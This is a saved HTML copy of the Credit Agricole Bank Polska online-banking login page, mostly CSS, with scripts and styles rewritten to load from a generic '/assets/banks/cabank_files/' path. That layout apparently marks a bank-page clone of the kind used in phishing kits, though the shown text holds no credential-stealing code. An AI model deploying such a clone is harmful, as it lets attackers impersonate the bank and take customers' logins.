<!DOCTYPE html>
<!-- saved from url=(0014)about:internet -->
<html lang="pl" class=" history svg supports target arrow no-contains dataset hidden placeholder inputsearchevent csspositionsticky smil details ellipsis flexbox no-cssgridlegacy cssgrid" data-whatinput="keyboard" data-whatintent="mouse" data-whatelement="div">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <title>Credit Agricole Bank Polska S.A.</title>
    <!--<base href="/web-ca24/">-->
    <base href=".">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0">
    <meta name="format-detection" content="telephone=no">
    <link rel="icon" type="image/x-icon" href="https://ca24.credit-agricole.pl/web-ca24/favicon.ico">
    <meta name="google-site-verification" content="FUstpOmJRHY3cnXykRHDPZmT3rcQKghulcjz9qYBDGU">
    <link rel="stylesheet" href="/assets/banks/cabank_files/styles.27b57bf32cc6065c0ff2.css">
    <style>
        .body-preload> :not(noscript),
        .body-preload> :not(noscript)>* {
            opacity: 0;
        }

        .body-preload:before {
            content: "";
            background: 50% 50% no-repeat;
            background-image: url(/web-ca24/assets/img/ca-preload.gif), radial-gradient(circle at 50%, rgba(255, 255, 255, 1) 0px, rgba(255, 255, 255, 1) 19px, rgba(0, 0, 0, 0.1) 20px, rgba(0, 0, 0, 0) 25px);
            display: block;
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
        }
    </style>
    <style></style>
    <style>
        .modal-auth .code-container {
            min-width: 280px;
            height: 280px;
            margin-left: -30px;
            margin-right: -30px
        }
    </style>
    <style>
        .table-agreements-to-be-signed .status-icon {
            font-size: 2em;
            display: inline-block;
            vertical-align: middle;
            margin: -.25em -.125em -.25em -.25em
        }

        .theme-default .table-agreements-to-be-signed .status-icon.active,
        .theme-hicontrast .table-agreements-to-be-signed .status-icon.active {
            color: #009788
        }

        .theme-default .table-agreements-to-be-signed .status-icon.inactive {
            color: #a8212a
        }

        .theme-hicontrast .table-agreements-to-be-signed .status-icon.inactive {
            color: #f76327
        }

        .table-agreements-to-be-signed .status-description {
            font-size: .75rem;
            font-weight: 400
        }

        .table-agreements-to-be-signed .column-files,
        .table-agreements-to-be-signed .column-status {
            text-align: right
        }

        .table-agreements-to-be-signed .column-status .ca-pending {
            font-size: 1.5em
        }

        .theme-default .table-agreements-to-be-signed .column-status .ca-pending,
        .theme-hicontrast .table-agreements-to-be-signed .column-status .ca-pending {
            color: #fba800
        }

        @media (max-width:767.98px) {
            .table-agreements-to-be-signed,
            .table-agreements-to-be-signed tbody,
            .table-agreements-to-be-signed thead {
                display: block
            }
            .table-agreements-to-be-signed tbody tr,
            .table-agreements-to-be-signed thead tr,
            .table-agreements-to-be-signed tr {
                display: flex;
                flex-flow: row wrap;
                align-items: center
            }
            .table-agreements-to-be-signed tbody tr:nth-child(n+2),
            .table-agreements-to-be-signed thead tr:nth-child(n+2),
            .table-agreements-to-be-signed tr:nth-child(n+2) {
                border: 0;
                border-top: 1px solid transparent
            }
            .theme-default .table-agreements-to-be-signed tbody tr:nth-child(n+2),
            .theme-default .table-agreements-to-be-signed thead tr:nth-child(n+2),
            .theme-default .table-agreements-to-be-signed tr:nth-child(n+2),
            .theme-hicontrast .table-agreements-to-be-signed tbody tr:nth-child(n+2),
            .theme-hicontrast .table-agreements-to-be-signed thead tr:nth-child(n+2),
            .theme-hicontrast .table-agreements-to-be-signed tr:nth-child(n+2) {
                border-color: #d8d8d8
            }
            .table-agreements-to-be-signed tbody td,
            .table-agreements-to-be-signed tbody th,
            .table-agreements-to-be-signed td,
            .table-agreements-to-be-signed th,
            .table-agreements-to-be-signed thead td,
            .table-agreements-to-be-signed thead th {
                display: block;
                border: 0;
                flex-grow: 1
            }
            .table-agreements-to-be-signed tbody td.column-date,
            .table-agreements-to-be-signed tbody th.column-date,
            .table-agreements-to-be-signed td.column-date,
            .table-agreements-to-be-signed th.column-date,
            .table-agreements-to-be-signed thead td.column-date,
            .table-agreements-to-be-signed thead th.column-date {
                flex-shrink: 1
            }
            .table-agreements-to-be-signed tbody td.column-title,
            .table-agreements-to-be-signed tbody th.column-title,
            .table-agreements-to-be-signed td.column-title,
            .table-agreements-to-be-signed th.column-title,
            .table-agreements-to-be-signed thead td.column-title,
            .table-agreements-to-be-signed thead th.column-title {
                flex-basis: 100%
            }
            .table-agreements-to-be-signed tbody td.column-title:not(:only-child),
            .table-agreements-to-be-signed tbody th.column-title:not(:only-child),
            .table-agreements-to-be-signed td.column-title:not(:only-child),
            .table-agreements-to-be-signed th.column-title:not(:only-child),
            .table-agreements-to-be-signed thead td.column-title:not(:only-child),
            .table-agreements-to-be-signed thead th.column-title:not(:only-child) {
                padding-bottom: 0
            }
        }

        @media (min-width:768px) {
            .table-agreements-to-be-signed tbody .column-status {
                vertical-align: middle
            }
        }

        .table-agreements-signed .status-icon {
            font-size: 2em;
            display: inline-block;
            vertical-align: middle;
            margin: -.25em -.125em -.25em -.25em
        }

        .theme-default .table-agreements-signed .status-icon.active,
        .theme-hicontrast .table-agreements-signed .status-icon.active {
            color: #009788
        }

        .theme-default .table-agreements-signed .status-icon.inactive {
            color: #a8212a
        }

        .theme-hicontrast .table-agreements-signed .status-icon.inactive {
            color: #f76327
        }

        .table-agreements-signed .status-description {
            font-size: .75rem;
            font-weight: 400
        }

        .table-agreements-signed .column-files,
        .table-agreements-signed .column-status {
            text-align: right
        }

        .table-agreements-signed .column-status .ca-pending {
            font-size: 1.5em
        }

        .theme-default .table-agreements-signed .column-status .ca-pending,
        .theme-hicontrast .table-agreements-signed .column-status .ca-pending {
            color: #fba800
        }

        @media (max-width:767.98px) {
            .table-agreements-signed,
            .table-agreements-signed tbody,
            .table-agreements-signed thead {
                display: block
            }
            .table-agreements-signed tbody tr,
            .table-agreements-signed thead tr,
            .table-agreements-signed tr {
                display: flex;
                flex-flow: row wrap;
                align-items: center
            }
            .table-agreements-signed tbody tr:nth-child(n+2),
            .table-agreements-signed thead tr:nth-child(n+2),
            .table-agreements-signed tr:nth-child(n+2) {
                border: 0;
                border-top: 1px solid transparent
            }
            .theme-default .table-agreements-signed tbody tr:nth-child(n+2),
            .theme-default .table-agreements-signed thead tr:nth-child(n+2),
            .theme-default .table-agreements-signed tr:nth-child(n+2),
            .theme-hicontrast .table-agreements-signed tbody tr:nth-child(n+2),
            .theme-hicontrast .table-agreements-signed thead tr:nth-child(n+2),
            .theme-hicontrast .table-agreements-signed tr:nth-child(n+2) {
                border-color: #d8d8d8
            }
            .table-agreements-signed tbody td,
            .table-agreements-signed tbody th,
            .table-agreements-signed td,
            .table-agreements-signed th,
            .table-agreements-signed thead td,
            .table-agreements-signed thead th {
                display: block;
                border: 0;
                flex-grow: 1
            }
            .table-agreements-signed tbody td.column-date,
            .table-agreements-signed tbody th.column-date,
            .table-agreements-signed td.column-date,
            .table-agreements-signed th.column-date,
            .table-agreements-signed thead td.column-date,
            .table-agreements-signed thead th.column-date {
                flex-shrink: 1
            }
            .table-agreements-signed tbody td.column-title,
            .table-agreements-signed tbody th.column-title,
            .table-agreements-signed td.column-title,
            .table-agreements-signed th.column-title,
            .table-agreements-signed thead td.column-title,
            .table-agreements-signed thead th.column-title {
                flex-basis: 100%
            }
            .table-agreements-signed tbody td.column-title:not(:only-child),
            .table-agreements-signed tbody th.column-title:not(:only-child),
            .table-agreements-signed td.column-title:not(:only-child),
            .table-agreements-signed th.column-title:not(:only-child),
            .table-agreements-signed thead td.column-title:not(:only-child),
            .table-agreements-signed thead th.column-title:not(:only-child) {
                padding-bottom: 0
            }
        }

        @media (min-width:768px) {
            .table-agreements-signed tbody .column-status {
                vertical-align: middle
            }
        }

        .table-agreements-signed time {
            font-size: .875rem;
            display: block
        }

        .table-agreements-signed time .day-name,
        .table-agreements-signed time .day-time {
            font-weight: 400
        }

        .table-agreements-signed time .day-month {
            font-weight: 700
        }

        .table-agreements-signed .column-files {
            text-align: right
        }

        .table-agreements-signed .opts {
            padding-top: 30px;
            padding-bottom: 30px
        }

        .theme-default .table-agreements-signed .opts {
            background: #b3d9f6;
            color: #4a4e51
        }

        .theme-hicontrast .table-agreements-signed .opts {
            background: #1f1f1f;
            color: #fff
        }

        .table-agreements-signed .carousel+.carousel {
            border: 0;
            border-top: 1px solid transparent
        }

        .theme-default .table-agreements-signed .carousel+.carousel,
        .theme-hicontrast .table-agreements-signed .carousel+.carousel {
            border-color: #d8d8d8
        }

        @media (max-width:767.98px) {
            .table-agreements-signed .tbody .tr,
            .table-agreements-signed .thead .tr {
                flex-flow: row wrap;
                align-items: center
            }
            .table-agreements-signed .tbody .tr .column-title,
            .table-agreements-signed .thead .tr .column-title {
                flex-basis: 100%
            }
            .table-agreements-signed .tbody .tr .column-title .cell,
            .table-agreements-signed .thead .tr .column-title .cell {
                padding-bottom: 0
            }
            .table-agreements-signed .tbody .tr .column-date,
            .table-agreements-signed .tbody .tr .column-files,
            .table-agreements-signed .thead .tr .column-date,
            .table-agreements-signed .thead .tr .column-files {
                flex-basis: 50%
            }
            .table-agreements-signed .tbody .td,
            .table-agreements-signed .tbody .th,
            .table-agreements-signed .thead .td,
            .table-agreements-signed .thead .th {
                display: flex;
                flex-grow: 1;
                align-items: center
            }
            .table-agreements-signed .tbody .td.column-status,
            .table-agreements-signed .tbody .th.column-status,
            .table-agreements-signed .thead .td.column-status,
            .table-agreements-signed .thead .th.column-status {
                justify-content: flex-end
            }
        }

        @media (min-width:768px) {
            .table-agreements-signed .column-date {
                min-width: 220px;
                white-space: nowrap
            }
            .table-agreements-signed .column-files {
                min-width: 200px
            }
            .table-agreements-signed tbody .column-date,
            .table-agreements-signed tbody .column-files {
                vertical-align: middle
            }
        }

        @media (max-width:767.98px) {
            #agreementsPageTop h1 {
                font-size: 1.4375rem
            }
        }

        .theme-default #agreementsPage .row.top,
        .theme-default #agreementsPageTop .row.top {
            background: #fff
        }

        .theme-hicontrast #agreementsPage .row.top,
        .theme-hicontrast #agreementsPageTop .row.top {
            background: #000
        }

        #agreementsPage .panel-default {
            margin-top: 1.5rem;
            margin-bottom: 1.5rem
        }

        #agreementsPage .panel-default>.panel-body {
            background: transparent
        }

        #agreementsPage .panel-default>.panel-body .accounts {
            margin-bottom: 40px
        }

        #agreementsPage .panel-default .panel-heading {
            cursor: pointer
        }

        #agreementsPage #agreementsDocuments.flex-table time {
            font-size: .875rem;
            display: block
        }

        #agreementsPage #agreementsDocuments.flex-table time .day-name,
        #agreementsPage #agreementsDocuments.flex-table time .day-time {
            font-weight: 400
        }

        #agreementsPage #agreementsDocuments.flex-table time .day-month {
            font-weight: 700
        }

        #agreementsPage #agreementsDocuments.flex-table .column-files {
            text-align: right
        }

        #agreementsPage #agreementsDocuments.flex-table .opts {
            padding-top: 30px;
            padding-bottom: 30px
        }

        .theme-default #agreementsPage #agreementsDocuments.flex-table .opts {
            background: #b3d9f6;
            color: #4a4e51
        }

        .theme-hicontrast #agreementsPage #agreementsDocuments.flex-table .opts {
            background: #1f1f1f;
            color: #fff
        }

        #agreementsPage #agreementsDocuments.flex-table .carousel+.carousel {
            border: 0;
            border-top: 1px solid transparent
        }

        .theme-default #agreementsPage #agreementsDocuments.flex-table .carousel+.carousel,
        .theme-hicontrast #agreementsPage #agreementsDocuments.flex-table .carousel+.carousel {
            border-color: #d8d8d8
        }

        @media (max-width:767.98px) {
            #agreementsPage #agreementsDocuments.flex-table .tbody .tr,
            #agreementsPage #agreementsDocuments.flex-table .thead .tr {
                flex-flow: row wrap;
                align-items: center
            }
            #agreementsPage #agreementsDocuments.flex-table .tbody .tr .column-title,
            #agreementsPage #agreementsDocuments.flex-table .thead .tr .column-title {
                flex-basis: 100%
            }
            #agreementsPage #agreementsDocuments.flex-table .tbody .tr .column-title .cell,
            #agreementsPage #agreementsDocuments.flex-table .thead .tr .column-title .cell {
                padding-bottom: 0
            }
            #agreementsPage #agreementsDocuments.flex-table .tbody .tr .column-date,
            #agreementsPage #agreementsDocuments.flex-table .tbody .tr .column-files,
            #agreementsPage #agreementsDocuments.flex-table .thead .tr .column-date,
            #agreementsPage #agreementsDocuments.flex-table .thead .tr .column-files {
                flex-basis: 50%
            }
            #agreementsPage #agreementsDocuments.flex-table .tbody .td,
            #agreementsPage #agreementsDocuments.flex-table .tbody .th,
            #agreementsPage #agreementsDocuments.flex-table .thead .td,
            #agreementsPage #agreementsDocuments.flex-table .thead .th {
                display: flex;
                flex-grow: 1;
                align-items: center
            }
            #agreementsPage #agreementsDocuments.flex-table .tbody .td.column-status,
            #agreementsPage #agreementsDocuments.flex-table .tbody .th.column-status,
            #agreementsPage #agreementsDocuments.flex-table .thead .td.column-status,
            #agreementsPage #agreementsDocuments.flex-table .thead .th.column-status {
                justify-content: flex-end
            }
        }

        @media (min-width:768px) {
            #agreementsPage #agreementsDocuments.flex-table .column-date {
                min-width: 220px;
                white-space: nowrap
            }
            #agreementsPage #agreementsDocuments.flex-table .column-files {
                min-width: 200px
            }
            #agreementsPage #agreementsDocuments.flex-table tbody .column-date,
            #agreementsPage #agreementsDocuments.flex-table tbody .column-files {
                vertical-align: middle
            }
        }

        #agreementsPage .table .status-icon {
            font-size: 2em;
            display: inline-block;
            vertical-align: middle;
            margin: -.25em -.125em -.25em -.25em
        }

        .theme-default #agreementsPage .table .status-icon.active,
        .theme-hicontrast #agreementsPage .table .status-icon.active {
            color: #009788
        }

        .theme-default #agreementsPage .table .status-icon.inactive {
            color: #a8212a
        }

        .theme-hicontrast #agreementsPage .table .status-icon.inactive {
            color: #f76327
        }

        #agreementsPage .table .status-description {
            font-size: .75rem;
            font-weight: 400
        }

        #agreementsPage .table .column-files,
        #agreementsPage .table .column-status {
            text-align: right
        }

        #agreementsPage .table .column-status .ca-pending {
            font-size: 1.5em
        }

        .theme-default #agreementsPage .table .column-status .ca-pending,
        .theme-hicontrast #agreementsPage .table .column-status .ca-pending {
            color: #fba800
        }

        @media (max-width:767.98px) {
            #agreementsPage .table,
            #agreementsPage .table tbody,
            #agreementsPage .table thead {
                display: block
            }
            #agreementsPage .table tbody tr,
            #agreementsPage .table thead tr,
            #agreementsPage .table tr {
                display: flex;
                flex-flow: row wrap;
                align-items: center
            }
            #agreementsPage .table tbody tr:nth-child(n+2),
            #agreementsPage .table thead tr:nth-child(n+2),
            #agreementsPage .table tr:nth-child(n+2) {
                border: 0;
                border-top: 1px solid transparent
            }
            .theme-default #agreementsPage .table tbody tr:nth-child(n+2),
            .theme-default #agreementsPage .table thead tr:nth-child(n+2),
            .theme-default #agreementsPage .table tr:nth-child(n+2),
            .theme-hicontrast #agreementsPage .table tbody tr:nth-child(n+2),
            .theme-hicontrast #agreementsPage .table thead tr:nth-child(n+2),
            .theme-hicontrast #agreementsPage .table tr:nth-child(n+2) {
                border-color: #d8d8d8
            }
            #agreementsPage .table tbody td,
            #agreementsPage .table tbody th,
            #agreementsPage .table td,
            #agreementsPage .table th,
            #agreementsPage .table thead td,
            #agreementsPage .table thead th {
                display: block;
                border: 0;
                flex-grow: 1
            }
            #agreementsPage .table tbody td.column-date,
            #agreementsPage .table tbody th.column-date,
            #agreementsPage .table td.column-date,
            #agreementsPage .table th.column-date,
            #agreementsPage .table thead td.column-date,
            #agreementsPage .table thead th.column-date {
                flex-shrink: 1
            }
            #agreementsPage .table tbody td.column-title,
            #agreementsPage .table tbody th.column-title,
            #agreementsPage .table td.column-title,
            #agreementsPage .table th.column-title,
            #agreementsPage .table thead td.column-title,
            #agreementsPage .table thead th.column-title {
                flex-basis: 100%
            }
            #agreementsPage .table tbody td.column-title:not(:only-child),
            #agreementsPage .table tbody th.column-title:not(:only-child),
            #agreementsPage .table td.column-title:not(:only-child),
            #agreementsPage .table th.column-title:not(:only-child),
            #agreementsPage .table thead td.column-title:not(:only-child),
            #agreementsPage .table thead th.column-title:not(:only-child) {
                padding-bottom: 0
            }
        }

        @media (min-width:768px) {
            #agreementsPage .table tbody .column-status {
                vertical-align: middle
            }
        }

        #agreementsPage .no-agreements-cta {
            text-align: center
        }

        #agreementsPage .no-agreements-cta a {
            font-size: 1rem;
            font-weight: 600
        }

        #agreementsPage .no-agreements-cta a .ca {
            font-size: 3em;
            vertical-align: middle
        }

        #agreementsPage .no-agreements-cta a span {
            display: inline-block;
            vertical-align: middle;
            text-align: left;
            max-width: calc(100% - 4em);
            line-height: 1.25em
        }

        @media (min-width:1160px) {
            #agreementsPage {
                min-height: inherit
            }
        }

        .file-list {
            padding: 0;
            margin: 0;
            line-height: 1
        }

        .file-list li {
            list-style: none none outside;
            margin: 0;
            padding: 0
        }

        .file-list li a {
            display: block;
            overflow: hidden;
            white-space: nowrap;
            text-overflow: ellipsis
        }

        .file-list li a .ca {
            font-size: 1.75em;
            vertical-align: -.375em
        }

        .pseudo-input {
            margin-right: .5rem;
            border: 2px solid transparent;
            border-radius: 4px;
            background: transparent;
            font-weight: 600;
            font-size: 1rem;
            text-align: left;
            padding: .45rem 1rem;
            line-height: 1.5;
            vertical-align: middle
        }

        .theme-default .pseudo-input {
            border-color: #007e90
        }

        .theme-hicontrast .pseudo-input {
            border-color: #9c0
        }

        .theme-default .pseudo-input {
            color: #4a4e51
        }

        .theme-hicontrast .pseudo-input {
            color: #fff
        }

        .pseudo-input:focus {
            outline: 0
        }

        .theme-default .pseudo-input:focus,
        .theme-hicontrast .pseudo-input:focus {
            box-shadow: 0 0 0 .2rem rgba(248, 249, 250, .5)
        }

        .theme-default .pseudo-input.placeholder {
            color: #999
        }

        .theme-hicontrast .pseudo-input.placeholder {
            color: #fff
        }

        #question_selection_btn {
            position: relative
        }

        #question_selection_btn .btn-primary:before {
            content: "";
            position: absolute;
            background: rgba(0, 0, 0, .001);
            width: 100%;
            height: 100%;
            left: 0;
            top: 0
        }

        #question_select .btn-wrapper label {
            font-weight: 400
        }

        #question_select .btn-wrapper:first-child {
            margin-top: 20px
        }

        #question_select .btn-wrapper:last-child {
            margin-bottom: 30px
        }

        #question_select .btn-wrapper+.btn-wrapper {
            margin-top: 21px
        }

        #question_select .btn-wrapper+.btn-wrapper:nth-child(3n+1) {
            margin-top: 30px
        }

        #question_select .buttons-center .btn-cancel {
            margin-right: 15px
        }

        @media (max-width:767.98px) {
            #question_select {
                padding-left: 0
            }
        }

        @media (min-width:768px) {
            #question_select {
                padding-left: 40px
            }
        }

        @media (min-width:1160px) {
            #question_select .btn-wrapper:first-child {
                margin-top: 50px
            }
            #question_select .btn-wrapper+.btn-wrapper {
                margin-top: 15px
            }
            #question_select .btn-wrapper+.btn-wrapper:nth-child(3n+1) {
                margin-top: 30px
            }
        }

        #answer_input .form-control,
        #answer_input label {
            font-weight: 600
        }

        ul.services {
            padding: 0
        }

        ul.services li {
            padding: 10px 0 0 75px;
            list-style: none none outside;
            font-weight: 400;
            font-size: .875rem
        }

        ul.services li:after {
            font-size: 0;
            line-height: 0;
            overflow: hidden;
            content: "";
            clear: both;
            display: block
        }

        ul.services li+li {
            margin-top: 10px
        }

        ul.services li:before {
            content: "\f0a3";
            font-weight: 400;
            font-size: 60px;
            font-family: cawebfont;
            float: left;
            margin: -31px 0 -31px -58px;
            width: 58px
        }

        .theme-default ul.services li:before,
        .theme-hicontrast ul.services li:before {
            color: #9c0
        }

        .theme-default ul.services li.inactive,
        .theme-default ul.services li.inactive:before,
        .theme-hicontrast ul.services li.inactive,
        .theme-hicontrast ul.services li.inactive:before {
            color: #999
        }

        .authorization-method {
            display: flex;
            flex-flow: row wrap;
            padding: 10px 0 0;
            font-weight: 400
        }

        .authorization-method>* {
            min-width: 0;
            white-space: normal
        }

        .authorization-method .icon {
            display: inline-block;
            vertical-align: middle;
            width: 70px;
            height: 70px;
            line-height: 49px;
            text-align: center;
            margin: 0 5px 0 -10px;
            font-weight: 300;
            border-radius: 50%;
            font-size: 70px
        }

        .authorization-method .authorization-method-base {
            width: calc(100% - 70px);
            line-height: 1.25;
            margin-bottom: .25em
        }

        .authorization-method .authorization-method-details {
            font-size: .75rem
        }

        .authorization-method .authorization-method-link {
            margin: auto 0 0 auto
        }

        #agreementsPage .btn-wrapper>.btn-checkbox:first-child+label,
        #agreementsPage .btn-wrapper>.btn-radio:first-child+label {
            font-weight: 400;
            line-height: 1.666em
        }

        .theme-default #agreementsNewColumns #agreementsMilestonesColumn {
            background-color: rgba(0, 0, 0, .4);
            color: #fff
        }

        .theme-hicontrast #agreementsNewColumns #agreementsMilestonesColumn {
            background-color: #000;
            color: inherit
        }

        @media (min-width:1160px) {
            #agreementsNewColumns>.row {
                display: -ms-grid;
                -ms-grid-columns: 33.333% 66.666%;
                -ms-grid-rows: minmax(0, max-content) auto;
                display: grid;
                grid-template-columns: 33.333% 66.666%;
                grid-template-rows: minmax(0, -webkit-max-content) -webkit-min-content;
                grid-template-rows: minmax(0, max-content) min-content
            }
            #agreementsNewColumns>.row #agreementsMilestonesColumn,
            #agreementsNewColumns>.row #agreementsPage,
            #agreementsNewColumns>.row #agreementsPageTop {
                flex-basis: 100%;
                max-width: 100%
            }
            #agreementsNewColumns>.row #agreementsMilestonesColumn {
                grid-column-start: 1;
                grid-row-start: 1;
                grid-row-end: 4;
                -ms-grid-column: 1;
                -ms-grid-row: 1;
                -ms-grid-row-span: 3
            }
            #agreementsNewColumns>.row #agreementsPageTop {
                grid-column-start: 2;
                grid-row-start: 1;
                -ms-grid-column: 2;
                -ms-grid-row: 1
            }
            #agreementsNewColumns>.row #agreementsPage {
                grid-column-start: 2;
                grid-row-start: 2;
                grid-row-end: 4;
                -ms-grid-column: 2;
                -ms-grid-row: 2;
                -ms-grid-row-span: 2
            }
        }

        .download-button-container a {
            display: block;
            padding-left: 48px;
            padding-right: 48px
        }

        .download-button-container a:after {
            clear: both;
            display: block;
            content: "";
            font-size: 0;
            overflow: hidden
        }

        .download-button-container a i {
            font-size: 60px;
            width: 48px;
            float: right;
            margin: -20px -40px -16px 0
        }

        .download-button-container a i.ca-download-file {
            float: left;
            margin: -14px 0 -16px -48px;
            font-size: 48px
        }

        .download-button-container a i.hidden-message.visible-add {
            display: inline-block;
            transition: opacity .25s;
            opacity: 0
        }

        .download-button-container a i.hidden-message.visible {
            display: inline-block;
            opacity: 1
        }

        .download-button-container a i.hidden-message.visible-remove {
            display: inline-block;
            transition: opacity .25s
        }

        .download-button-container a i.hidden-message.visible-remove-active {
            opacity: 0
        }

        .theme-default .download-button-container a i.hidden-message,
        .theme-hicontrast .download-button-container a i.hidden-message {
            color: #9c0
        }

        .download-button-container a span {
            font-weight: 400;
            float: left
        }

        .download-button-container a em {
            float: left;
            clear: left;
            font-size: .75rem;
            margin-top: -20px;
            text-decoration: none;
            font-style: normal
        }

        .theme-default .download-button-container a em {
            color: #4a4e51
        }

        .theme-hicontrast .download-button-container a em {
            color: #fff
        }

        .download-button-container a+.hidden-message {
            line-height: 1.25;
            font-weight: 600;
            padding-left: 34px
        }

        .download-button-container a+.hidden-message.visible-add {
            display: block;
            transition: opacity .25s;
            opacity: 0
        }

        .download-button-container a+.hidden-message.visible {
            display: block;
            opacity: 1
        }

        .download-button-container a+.hidden-message.visible-remove {
            display: block;
            transition: opacity .25s
        }

        .download-button-container a+.hidden-message.visible-remove-active {
            opacity: 0
        }

        .download-button-container a+.hidden-message .ca {
            float: left;
            margin-left: -24px;
            width: 24px;
            font-weight: 300
        }

        .theme-default .download-button-container a+.hidden-message .ca,
        .theme-hicontrast .download-button-container a+.hidden-message .ca {
            color: #ff6d26
        }

        .giant-icon {
            text-align: center;
            margin: 1rem 0
        }

        .giant-icon .ca {
            display: inline-block
        }

        .theme-default .giant-icon .ca.ca-success-circle,
        .theme-hicontrast .giant-icon .ca.ca-success-circle {
            color: #9c0
        }

        .theme-default .giant-icon .ca.ca-warning-circle,
        .theme-hicontrast .giant-icon .ca.ca-warning-circle {
            color: #ff6d26
        }

        .theme-default .giant-icon .ca.ca-reject-circle {
            color: #a8212a
        }

        .theme-hicontrast .giant-icon .ca.ca-reject-circle {
            color: #9c0
        }

        @media (max-width:767.98px) {
            .giant-icon .ca {
                font-size: 120px;
                margin: -40px 0
            }
            .giant-icon .ca.ca-reject-circle,
            .giant-icon .ca.ca-success-circle {
                font-size: 103px;
                line-height: 103px;
                margin: -.6px 0 1.4px
            }
            .giant-icon .ca.ca-warning-circle {
                font-size: 74px;
                line-height: 74px;
                margin: 13.34px 0 15.34px
            }
        }

        @media (min-width:768px) and (max-width:1159.98px) {
            .giant-icon .ca {
                font-size: 240px;
                margin: -80px 0
            }
            .giant-icon .ca.ca-reject-circle,
            .giant-icon .ca.ca-success-circle {
                font-size: 206px;
                line-height: 206px;
                margin: -21.2px 0 -19.2px
            }
            .giant-icon .ca.ca-warning-circle {
                font-size: 147px;
                line-height: 147px;
                margin: 6.77px 0 8.77px
            }
        }

        @media (min-width:1160px) {
            .giant-icon .ca.ca-reject-circle,
            .giant-icon .ca.ca-success-circle {
                font-size: 310px;
                line-height: 310px;
                margin: -42px 0 -40px
            }
            .giant-icon .ca.ca-warning-circle {
                font-size: 220px;
                line-height: 220px;
                margin: .2px 0 2.2px
            }
        }
    </style>
    <script type="text/javascript" async="" defer="" src="/assets/banks/cabank_files/ppms.js.pobrane"></script>
    <script async="" src="/assets/banks/cabank_files/265f0d0d-835d-4e15-8170-8ce06578a812.js.pobrane"></script>
    <script charset="utf-8" src="/assets/banks/cabank_files/4-es2015.4113dd75a21f141e46a5.js.pobrane"></script>
    <script charset="utf-8" src="/assets/banks/cabank_files/10-es2015.e052262f881f89750cd6.js.pobrane"></script>
    <script charset="utf-8" src="/assets/banks/cabank_files/common-es2015.7352c1a8b1dbff12bddc.js.pobrane"></script>
    <script charset="utf-8" src="/assets/banks/cabank_files/24-es2015.a0e28539f63df5afffb8.js.pobrane"></script>
    <script charset="utf-8" src="/assets/banks/cabank_files/55-es2015.a0ca822f99d971dff37d.js.pobrane"></script>
    <script id="mp-shield-script" type="text/javascript" src="/assets/banks/cabank_files/tips.min.js.pobrane"></script>
    <style>
        [_nghost-vlj-c151],
        app-login-security-image[_ngcontent-vlj-c151] {
            display: block
        }
    </style>
    <style>
        .app-guid-login {
            position: absolute;
            top: 2px;
            left: 45%;
            font-size: 12px
        }

        .login header {
            position: static !important
        }

        .login header img {
            display: none
        }

        .theme-default .login header {
            background-color: #f5f5f5
        }

        .theme-hicontrast .login header {
            background-color: #000
        }

        .login header .logo-container {
            padding: 0 10px
        }

        .theme-default .login header .logo-container {
            background: transparent
        }

        .theme-hicontrast .login header .logo-container {
            background: #1f1e1e
        }

        .login header .logo-container .logo {
            text-indent: -987px;
            overflow: hidden;
            display: block;
            background-position: 50%;
            background-repeat: no-repeat;
            background-size: auto;
            width: 100%;
            height: 60px
        }

        .login header .logo-container .logo,
        .theme-default .login header .logo-container .logo {
            background-image: url(/web-ca24/ca-top-tablet.b70d6d57dd5659f45046.png)
        }

        .theme-hicontrast .login header .logo-container .logo {
            background-image: url(/web-ca24/ca-top-tablet-hc.e50d71cbc0e11829169a.png)
        }

        @media (min-width:1160px) {
            .login header .logo-container {
                padding: 0 40px
            }
            .login header .logo-container .logo {
                height: 60px;
                background-position: 0;
                background-size: auto 30px
            }
            .login header .logo-container .logo,
            .theme-default .login header .logo-container .logo {
                background-image: url(/web-ca24/ca-color-top.c8bd5adb63b9f872b79f.png)
            }
            .theme-hicontrast .login header .logo-container .logo {
                background-image: url(/web-ca24/ca-color-top-hc.d12aa652061223831ab8.png)
            }
        }
    </style>
    <style>
        .theme-default footer,
        .theme-hicontrast footer {
            color: #fff
        }

        @media (min-width:768px) {
            footer {
                background: linear-gradient(90deg, #202123, #202123 65%, #2c2d31 0, #2c2d31)
            }
        }

        @media (max-width:1159.98px) {
            footer {
                background: #202123
            }
            footer .site-width {
                width: 100%
            }
            footer .menu-element {
                order: 1
            }
        }

        @media (max-width:1159.98px) and (min-width:768px) {
            footer .menu-element {
                flex-basis: 86%;
                margin: 0 auto
            }
        }

        @media (max-width:1159.98px) and (max-width:767.98px) {
            footer .menu-element {
                max-width: 400px;
                margin: 0 auto
            }
        }

        @media (max-width:1159.98px) {
            footer .contact-element {
                order: 0
            }
        }

        @media (max-width:1159.98px) and (min-width:768px) {
            footer .contact-element>div {
                width: 86%;
                margin: 0 auto
            }
        }

        @media (max-width:1159.98px) and (max-width:767.98px) {
            footer .contact-element>div {
                max-width: 400px;
                margin: 0 auto
            }
        }

        @media (max-width:1559.98px) and (min-width:1160px) {
            footer .container-fluid {
                padding: 0
            }
        }

        footer .menu-element {
            padding-bottom: 20px;
            display: flex
        }

        footer .menu-element>div {
            margin-top: 30px
        }

        @media (max-width:767.98px) {
            footer .menu-element {
                flex-wrap: wrap
            }
            footer .menu-element>div {
                flex-basis: 100%;
                max-width: 100%;
                order: 1;
                margin-top: 15px
            }
            footer .menu-element>div.footer-buttons {
                order: 0
            }
        }

        @media (min-width:768px) and (max-width:1159.98px) {
            footer .menu-element>div {
                flex-basis: 50%;
                max-width: 50%
            }
        }

        @media (min-width:1160px) {
            footer .menu-element>div {
                flex: 60% 1 1;
                display: flex;
                flex-flow: column nowrap
            }
        }

        footer .flag {
            width: 21px;
            height: 21px;
            display: inline-block;
            margin-right: 6px;
            vertical-align: -5px;
            background-position: 0 0;
            background-size: 100% 100%;
            background-repeat: no-repeat
        }

        footer .flag.flag-pl {
            background-image: url(/web-ca24/flag-pl.2115d36b89c9c6ae4c50.svg)
        }

        footer .flag.flag-en {
            background-image: url(/web-ca24/flag-en.abd58ebb107ce303e6a3.svg)
        }

        footer .flag.flag-fr {
            background-image: url(/web-ca24/flag-fr.02697158948d1b783f91.svg)
        }

        footer .flag.flag-uk {
            background-image: url(/web-ca24/flag-uk.aa52fb4a06c57325c736.svg)
        }

